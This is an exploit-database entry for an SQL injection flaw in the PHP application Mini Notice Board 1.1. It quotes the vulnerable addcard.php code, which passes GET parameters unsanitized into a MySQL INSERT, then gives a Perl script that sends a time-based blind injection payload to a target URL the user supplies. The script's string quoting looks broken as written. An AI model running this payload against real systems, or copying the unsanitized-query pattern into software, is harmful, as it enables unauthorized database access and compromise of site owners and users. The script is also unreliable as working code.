Mini Notice Board 1.1 SQL Injection Exploit

2016-11-02T00:00:00
ID 1337DAY-ID-26214
Type zdt
Reporter N_A
Modified 2016-11-02T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #!/usr/bin/perl -w

#mininoticeboard_v1.1 SQL Injection Exploit
#==========================================


#Discovered by N_A , N_A[at]tutanota.com
#========================================


#Vendor has been notified
#=========================


#Description
#============

#Mini Notice Board is a small noticeboard application that allows users to post notice cards online. e.g. if people want to sell their car
#or lawnmower or want to provide services, they can simply write a card.
#It supports unlimited Regions.

#https://sourceforge.net/projects/mininoticeboard/


#Vulnerability
#=============

#addcard.php:

#The variables from the GET request are fed unsanitized directly into the MYSQL database resulting in an SQL Injection

#$title = $_GET["title"];
#$body = $_GET["body"];
#$contact = $_GET["contact"];
#$address = $_GET["address"];
#$tel = $_GET["tel"];
#$date_day = date("d");
#$date_month = date("m");
#$date_year = date("y");
#$romovalcode = genremovalcode();
#$categorie = $cid;

#if($title!="" && $body!="" && $tel!="" && $contact!="")

#{

# include 'dbconnect.php';
# $sqlset["tablename"] = $sqlset["tableprefix"].'content';
# mysql_query('INSERT INTO `'.$sqlset["tablename"].'` (`title`, `content`, `contact`, `address`, `tel`, `date_day`, `date_month`, `date_year`, #`removalcode`, `categorie`) VALUES (''.$title.'', ''.$body.'', ''.$contact.'', ''.$address.'', ''.$tel.'', ''.$date_day.'',
#''$date_month.'', ''.$date_year.'', ''.$romovalcode.'', ''.$categorie.'')') or $status = 'red';




#Proof Of Concept Exploit attached below

#N_A, N_A[at]tutanota.com




use strict;
use LWP::Simple;


my ($url) = @ARGV;
if( not defined $url )
{

print "=========================================\n";
print "Mini Notice Board SQL Injection Exploit\n";
print "tBy N_A\n";
print "\n";
print "$0 [URL]\n";
print "$0 127.0.0.1/mininoticeboard\n";
print "=========================================\n";
exit;
}


my $file = '/addcard.php'; #The Vulnerable .php file
my $injection = 'title=pentest&body=blah' OR (SELECT * FROM (SELECT(SLEEP(5)))jAEh) AND 'OKSG'='OKSG&tel=555&contact=blahblah&address=blahblah&submit=Add+Card';


my $request ="http://".$url.$file."?".$injection; #Forming the exploit string
my $content = get $request;
die "Could not get $request" unless defined $content;

#It should hang here for about 5 seconds..... (SLEEP(5)) as per injection

print "##########################\n";
print "SQL Injection Successful!\n";
print "##########################\n"

#  0day.today [2018-04-03]  #